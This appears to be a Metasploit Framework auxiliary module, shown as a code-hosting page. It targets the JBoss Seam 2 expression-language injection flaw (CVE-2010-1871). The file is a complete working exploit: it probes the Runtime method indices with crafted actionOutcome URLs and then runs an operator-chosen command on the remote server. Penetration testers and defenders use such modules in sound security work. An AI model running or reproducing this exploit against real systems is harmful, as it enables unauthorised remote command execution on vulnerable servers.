104 lines
3.4 KiB
Ruby
104 lines
3.4 KiB
Ruby
##
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
# web site for more information on licensing and terms of use.
|
|
# http://metasploit.com/
|
|
##
|
|
|
|
require 'msf/core'
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'JBoss Seam 2 Remote Command Execution',
|
|
'Description' => %q{
|
|
JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform
|
|
4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression
|
|
Language (EL) expressions, which allows remote attackers to execute arbitrary code
|
|
via a crafted URL. This modules also has been tested successfully against IBM
|
|
WebSphere 6.1 running on iSeries.
|
|
|
|
NOTE: this is only a vulnerability when the Java Security Manager is not properly
|
|
configured.
|
|
},
|
|
'Author' =>
|
|
[
|
|
'guerrino di massa', # Metasploit module
|
|
'Cristiano Maruti <cmaruti[at]gmail.com>' # Support for IBM Websphere 6.1
|
|
],
|
|
'License' => MSF_LICENSE,
|
|
'References' =>
|
|
[
|
|
[ 'CVE', '2010-1871' ],
|
|
[ 'OSVDB', '66881']
|
|
],
|
|
'DefaultTarget' => 0,
|
|
'DisclosureDate' => 'Jul 19 2010'))
|
|
|
|
register_options(
|
|
[
|
|
Opt::RPORT(8080),
|
|
OptString.new('TARGETURI', [ true, 'Target URI', '/seam-booking/home.seam']),
|
|
OptString.new('CMD', [ true, "The command to execute."])
|
|
], self.class)
|
|
end
|
|
|
|
def run
|
|
uri = normalize_uri(target_uri.to_s)
|
|
cmd_enc = ""
|
|
cmd_enc << Rex::Text.uri_encode(datastore["CMD"])
|
|
|
|
flag_found_one = 255
|
|
flag_found_two = 255
|
|
|
|
uri_part_1 = "?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()["
|
|
uri_part_2 = "].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()["
|
|
uri_part_3 = "].invoke(null),'"
|
|
|
|
25.times do |index|
|
|
req = uri + uri_part_1 + index.to_s + "]}"
|
|
|
|
res = send_request_cgi(
|
|
{
|
|
'uri' => req,
|
|
'method' => 'GET',
|
|
}, 20)
|
|
|
|
if (res and res.headers['Location'] =~ %r(java.lang.Runtime.exec\%28java.lang.String\%29))
|
|
flag_found_one = index
|
|
print_status("Found right index at [" + index.to_s + "] - exec")
|
|
elsif (res and res.headers['Location'] =~ %r(java.lang.Runtime\+java.lang.Runtime.getRuntime))
|
|
print_status("Found right index at [" + index.to_s + "] - getRuntime")
|
|
flag_found_two = index
|
|
else
|
|
print_status("Index [" + index.to_s + "]")
|
|
end
|
|
end
|
|
|
|
if (flag_found_one != 255 && flag_found_two != 255 )
|
|
print_status("Target appears VULNERABLE!")
|
|
print_status("Sending remote command:" + datastore["CMD"])
|
|
|
|
req = uri + uri_part_1 + flag_found_one.to_s + uri_part_2 + flag_found_two.to_s + uri_part_3 + cmd_enc + "')}"
|
|
|
|
res = send_request_cgi(
|
|
{
|
|
'uri' => req,
|
|
'method' => 'GET',
|
|
}, 20)
|
|
|
|
|
|
if (res and res.headers['Location'] =~ %r(pwned=java.lang.UNIXProcess))
|
|
print_status("Exploited successfully")
|
|
else
|
|
print_status("Exploit failed.")
|
|
end
|
|
else
|
|
print_error("Target appears not vulnerable!")
|
|
end
|
|
end
|
|
end
|